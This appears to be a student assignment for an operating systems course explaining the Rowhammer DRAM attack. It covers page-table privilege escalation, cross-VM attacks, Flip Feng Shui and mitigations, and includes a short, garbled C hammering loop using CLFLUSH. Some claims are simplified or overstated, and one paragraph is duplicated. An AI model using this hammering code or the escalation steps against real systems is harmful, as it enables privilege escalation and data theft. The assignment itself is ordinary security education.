Submitted by: Noor Fatima

Submitted to: Mam Zakia Jaleel

Reg No. 4678-FOC/BSCS/F22
Course: Operating System

Assignment # 1
Rowhammer Attack

1
 Rowhammer Attack: A Deep Dive

1. Introduction
The Rowhammer attack is a hardware-based security vulnerability that affects DRAM (Dynamic
Random Access Memory). It was first discovered in 2014, and it exploits the way modern memory cells
are physically structured.

Why is it dangerous?

o It allows unprivileged users to corrupt memory.

o It can be used to escalate privileges, bypass security mechanisms, and steal sensitive data from
other processes.

o It is a hardware-level attack, making it difficult to patch via software updates.

2. How Rowhammer Works

2.1 DRAM Basics

DRAM stores data in capacitors, which hold electrical charges. Each capacitor represents a bit (0 or 1).
These capacitors are arranged in rows and controlled by row access transistors.

o Each memory row is activated (opened) when the CPU accesses it.

o Repeated access to a row (hammering) causes electrical interference, leading to bit flips in
adjacent rows.

2.2 Rowhammer Effect: Bit Flipping

o If a row is accessed too frequently, it can cause bit flips in neighboring rows.

o This means a 0 might change to 1, or vice versa, in adjacent rows.

o These bit flips can alter program data, security settings, or even OS kernel data.

Structure of DRAM:

2
Row consists of cells and each cell consists of capacitor and transistor. The capacitor stores a tiny amount

of charge to store a value in a cell.

3
Hammering a DRAM with flush and reload:

When you access a row very often, bits might flip in the neighbouring row.

Before:

Row A: 1101010110

Row B: 0010101011 <-- Target Row (bit flips occur here)

Row C: 1101010110

After Rowhammer:

Row A: 1101010110

Row B: 0010111011 <-- Bit flip occurred!

Row C: 1101010110

3. How Rowhammer Attacks an OS (Memory Exploitation)

Rowhammer exploits work by modifying critical memory areas. Here’s how attackers use it against the
OS:

4
3.1 Step-by-Step Memory Attack

1. Identifying Vulnerable Memory Rows

o The attacker finds memory addresses that can be hammered.

o This requires mapping physical memory addresses (done via /proc/self/pagemap on

Linux).

2. Triggering Bit Flips

o The attacker hammers selected rows in memory thousands to millions of times per
second.

o This process flips bits in the adjacent row without directly accessing it.

3. Modifying Page Table Entries (PTEs)

o The OS stores page table entries (PTEs) in memory to manage access control.

o A bit flip in PTEs can:

 Change read-only memory to writable.

 Modify user-space memory to kernel memory, leading to privilege escalation.

5
 4. Escalating Privileges

o Attackers can modify kernel-level structures, giving themselves root/admin privileges.

5. Accessing Other Processes' Memory

o Once privileges are elevated, attackers can read and modify other processes' memory.

o This allows them to steal passwords, encryption keys, or inject malicious code.

4. How Rowhammer Penetrates Other Processes’ Information

Rowhammer is particularly dangerous because it bypasses traditional virtual memory protections and
affects other processes running on the same system. This makes it a serious security risk for multi-user
environments, virtual machines, and cloud computing.

1. Understanding Virtual Memory vs. Physical Memory

Feature Virtual Memory Physical Memory (RAM)

A memory management system that

What is it? The actual RAM chips storing data.
isolates processes.

Who controls The OS and CPU's memory management

The hardware (DRAM chips).
it? unit (MMU).

No, each process has its own virtual Yes, multiple processes access the same
Is it shared?
memory space. physical memory.

How Virtual Memory Normally Prevents Attacks

6
  Each process runs in its own isolated memory space.

 A process cannot directly access another process’s memory.

 The operating system (OS) maps virtual memory to physical memory.

 Security mechanisms like Address Space Layout Randomization (ASLR) make it harder for
attackers to predict memory locations.

 Key Weakness: Rowhammer does not attack virtual memory; instead, it attacks physical
memory directly. Since virtual memory is mapped to physical memory, bit flips in physical
memory can affect multiple virtual memory spaces.

Additionally, modern CPUs include memory protection mechanisms like Intel SGX and ARM
TrustZone, which Rowhammer can also target.

2. How Rowhammer Bypasses Virtual Memory Protections

Since Rowhammer operates at the hardware level, it can break process isolation in several ways:

 Direct Memory Corruption Across Processes

Even though processes are separated in virtual memory, they share the same physical RAM. If an
attacker can flip bits in a shared memory region, they can:

1. Corrupt another process’s memory (causing crashes or injecting malicious data).

2. Alter OS kernel data (escalating privileges).

3. Modify encryption keys stored in memory.

Example:

 Process A (user application) has virtual memory mapped to physical memory region X.

 Process B (another application) also has a different virtual address, but it maps to physical
memory region X.

 If Process A runs a Rowhammer attack, it can cause bit flips in region X, affecting Process B
without needing direct access to it.

Attackers often use cache flushing (e.g., CLFLUSH instruction) to increase bit flip reliability,
ensuring the attack works more effectively.

3. Attacks on Cloud & Virtual Machines (VMs)

 Multi-Tenant Cloud Systems

In cloud computing, multiple virtual machines (VMs) from different users run on the same physical
server. These VMs share the same DRAM, even though they have separate virtual memory.

 How Rowhammer Works in the Cloud:

7
 1. A hacker rents a VM in a cloud provider (AWS, Google Cloud, etc.).

2. The attacker runs a Rowhammer attack inside their VM.

3. The attack flips bits in memory used by another victim's VM running on the same server.

4. This allows the hacker to modify or leak sensitive information from another customer’s VM!

Real-World Example:

 Researchers demonstrated Rowhammer attacks in the cloud where one VM could exploit bit
flips to gain control over another VM running on the same physical server.

Cloud providers mitigate Rowhammer risks through ECC RAM, TRR (Target Row Refresh),
and disabling memory deduplication.

 Flip Feng Shui Attack (Targeting Shared Memory in the Cloud)

A special Rowhammer attack called Flip Feng Shui allows attackers to target specific bits in a victim’s
memory in a cloud environment.

1. Memory Deduplication: Cloud providers use deduplication to save space by sharing identical
memory pages between VMs.

2. Attacker Injects Data: The attacker forces the system to store their data in the same physical
page as the victim’s.

3. Bit Flip Corruption: The attacker hammers the memory to flip a bit in the shared memory,
corrupting the victim’s sensitive data (like cryptographic keys).

Impact:

 Attackers can modify SSH keys, authentication data, or passwords in a victim's memory.

 Cloud providers like AWS, Azure, and Google Cloud have disabled memory deduplication to
prevent such attacks.

Unlike traditional Rowhammer, Flip Feng Shui gives attackers better control over which bits
flip, allowing precision attacks on security-critical data.

4. Extracting Sensitive Data with Rowhammer

 Attacking Cryptographic Keys

 Many security-sensitive applications store cryptographic keys in RAM.

 If a Rowhammer attack flips bits in these keys, decryption might become easier or the key itself
can be completely exposed.

Example: Attacking AES Encryption Keys

 AES (Advanced Encryption Standard) uses fixed-length keys (128-bit, 192-bit, 256-bit).

8
 If an attacker flips just a few bits in an AES key, it can weaken encryption.

 In some cases, this allows attackers to recover the original key faster, breaking security.

Unlike traditional Rowhammer, Flip Feng Shui gives attackers better control over which bits
flip, allowing precision attacks on security-critical data.

 Stealing Login Credentials

 If a Rowhammer attack targets a memory page storing password hashes, an attacker can corrupt
or extract those hashes.

 Once the password hash is known, it can be cracked offline.

 Modifying Authentication Mechanisms

 Many authentication systems store user permissions and roles in memory.

 If an attacker flips a bit in the user’s permission level, they could escalate privileges (e.g., a
normal user becomes an admin).

9
5. Real-World Rowhammer Attack Variants
1. Double-Sided Rowhammer

o The attacker hammers two rows surrounding a victim row.

o Most effective in causing bit flips.

2. Single-Sided Rowhammer

o Only hammers one row, but still causes bit flips.

3. Rowhammer.js (JavaScript Attack)

o Uses JavaScript in a web browser to induce Rowhammer effects.

o Can exploit WebAssembly (WASM) for improved efficiency.

4. Flip Feng Shui

o Targets memory deduplication in cloud environments.

o Allows an attacker to manipulate another user's data in a shared memory environment.

6.Rowhammer Code Example (C Language)

#include <stdio.h>

#include <stdlib.h>

#include <x86intrin.h> // For cache manipulation

#define NUM_ACCESSES 1000000

void hammer_memory(char *addr1, char *addr2) {

10
 for (int i = 0; i < NUM_ACCESSES; i++) {

_mm_clflush(addr1); // Flush cache

_mm_clflush(addr2);

*(volatile char *)addr1; // Access memory

*(volatile char *)addr2;

int main() {

size_t mem_size = 1024 * 1024 * 64; // Allocate 64MB

char *memory = malloc(mem_size);

if (!memory) {

printf("Memory allocation failed!\n");

return -1;

char *addr1 = &memory[4096]; // Row A

char *addr2 = &memory[8192]; // Row C

hammer_memory(addr1, addr2);

printf("Rowhammer executed!\n");

free(memory);

return 0;

What this code does:

 Allocates 64MB of memory.

11
  Repeatedly accesses two specific rows (A and C).

 Triggers bit flips in the adjacent row (B).

7. Prevention & Mitigation Techniques

Since Rowhammer is a hardware vulnerability, complete mitigation is difficult. However, defenses
include:

1. Error-Correcting Code (ECC) Memory

o ECC RAM detects and corrects bit flips before they cause harm.

2. Increasing DRAM Refresh Rate

o More frequent refresh cycles reduce the chances of bit flips.

3. Software-Based Mitigations

o Kernel patches to randomize memory allocations.

o Disabling unprivileged memory access (e.g., restricting /proc/self/pagemap).

4. Rowhammer Mitigation in Newer Hardware

o Some modern DRAM chips include Target Row Refresh (TRR) to block Rowhammer
effects.

References:

 Original Rowhammer Research Paper:

https://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
 Google Project Zero's Rowhammer Blog:
https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html

12